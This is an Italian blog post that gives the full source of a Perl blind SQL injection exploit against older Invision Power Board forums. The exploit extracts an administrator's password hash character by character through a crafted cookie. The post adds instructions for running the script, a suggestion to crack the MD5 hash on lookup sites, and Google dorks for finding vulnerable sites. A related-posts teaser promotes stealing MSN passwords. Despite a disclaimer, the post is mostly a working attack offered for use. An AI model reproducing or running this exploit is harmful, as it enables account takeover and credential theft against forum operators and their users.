ATTENZIONE: questa guida è solo a scopo didattico; tutto quello scritto qui sotto è ILLEGALE. Fate quello che volete, non mi ritengo responsabile.

Questa è una velocissima guida per “rubare” la password dell’amministratore di un forum targato Invision Power Board, dalla versione 2.1 in giù.

L’exploit è questo qui:


#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?(‘member_login_key’):(‘password’);
$server =~ s!(http:\/\/)!!;
$request = ‘http://’;
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print “[~] SERVER : $server\r\n”;
print “[~] PATH : $path\r\n”;
print “[~] MEMBER ID : $member_id\r\n”;
print “[~] TARGET : $target”;
print (($target)?(‘ – IPB 2.*’):(‘ – IPB 1.*’));
print “\r\n”;
print “[~] RICERCA PASSWORD … [|]“;
($cmember_id = $member_id) =~ s/(.)/”%”.uc(sprintf(“%2.2x”,ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char==”0″)
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?(‘MEMBER_LOGIN_KEY : ‘):(‘PASSWORD : ‘));
print $allchar.”\r\n”;
}
else
{
print “\b\b Mi dispiace. Il sito non è vurnerabile’ ]”;
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax – ($fmax-$fmin)/2);
$check = ” BETWEEN $r AND $fmax”;
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = “=$i”;
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = “%36%36%36%2527%20%4F%52%20%28%69%64%3D”;
$pass_hash2 = “%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28″;
$pass_hash3 = $pass.”,”.$s_num.”,1))”.$ccheck.”) /*”;
$pass_hash3 =~ s/(.)/”%”.uc(sprintf(“%2.2x”,ord($1)))/eg;
$nmalykh = “%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21″;
$socket = IO::Socket::INET->new( Proto => “tcp”, PeerAddr => “$server”, PeerPort => “80″);
printf $socket (“GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n”,
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print “\b\b/]”; }
if($status==1){ print “\b\b-]”; }
if($status==2){ print “\b\b\\]”; }
if($status==3){ print “\b\b|]”; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
—————————————————-
USO:
~~~~~~
exploit.pl [server] [/cartella/] [utente] [target]
[server] – Sito vittima
[/folder/] – Cartella in cui ? installato IPB
[member_id] – Utente da Craccare
targets:
0 – per versioni di IPB 1.x
1 – per versioni di IPB 2.x (Inferiore alla 2.0.4)
Esempio exploit.pl http://xxx.com /IPB/ 1 1
—————————————————-
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}

Per utilizzarlo copiare il codice qui sopra e salvarlo in documento di testo con estensione pl. Per utilizzare l'exploit è necessario il compilatore Active Perl, scaricabile da qui. Copiare l'exploit sul desktop con il nome per esempio exploit.pl.
Aprire il cmd (esegui, "cmd" senza apici, invio) e dare il comando

cd desktop

scrivere ora exploit.pl (nel caso l'avete chiamato così).

vi risulterà quindi:

Per utilizzare l'exploit fare aggiungere di seguito a exploit.pl il nome del server del forum (completo di http://), la cartella (/forum/ di solito), il numero dell'utente (se è l'admin 1) e il target (utilizzare la tabella sopra citata sotto la voce targets.
Quello che otterrete sarà una password in md5. Potete ottenere la password in chiaro in un dei tanti siti che permettono di farlo dato un database di hash; questo perchè l'algoritmo è pubblico. Uno ottimo è http://md5.rednoize.com/

Per trovare i forum "compatibili" utilizzate le dork di google del tipo: +"Powerd by Invision Power Board v2.0" ecc.. vedete voi.

Vi avviso che utilizzare exploit altrui è da lamerozzoli e soprattutto illegale; io voglio solo illustrarvi come si fa.

Non mi riterrò responsabile in alcun modo dell'uso che ne farete.

UPDATE: l'articolo qui sopra citato è vecchio (più di 3 mesi fa) e le informazioni ivi descritte potrebbero non essere aggiornate alle ultime novità circa l'argomento trattato.

Se ti è piaciuto questo articolo, potrebbero interessarti:

[PHP] L’array superglobals $_SERVER

Tra il client (browser) e il server (web server) avviene una vera è propria "presentazione" intesa come scambio reciproco di parametri che permette...
Pubblicato il: 9 febbraio 2010



Minilol: 10 minuti per avere un sito bello e pronto

Penso sia il più utilizzato cms dalla gran parte della comunità dell'underground informatico (e non) per pubblicare i propri source, i propri...
Pubblicato il: 29 novembre 2009



3 metodi (quasi) infallibili per rubare la passoword di Msn

Probabilmente lo saprai meglio di me: in rete ci sono moltissimi metodi descritti che assicurano il buon esito di questa delicata operazione. Molti...
Pubblicato il: 5 novembre 2009



Come aggiungere la favicon al tuo sito

Una favicon (contrattura dall'inglese di favorites icon, icona preferiti) è quell'iconcina che compare a lato dell'url di un sito web e accanto al...
Pubblicato il: 22 ottobre 2009



Come fare un Redirect

Oggi vi presento una velocissima ma molto utile guida su come fare un redirect in diversi linguaggi di programmazione lato web, quali: PHP, HTML, ASP...
Pubblicato il: 19 ottobre 2009



Come rintracciare il mittente di un email

Proprio oggi sono stato tartassato, via Subito.it, un noto portale di compra-vendita, di numerose email-truffa. Era cristallino che erano...
Pubblicato il: 13 ottobre 2009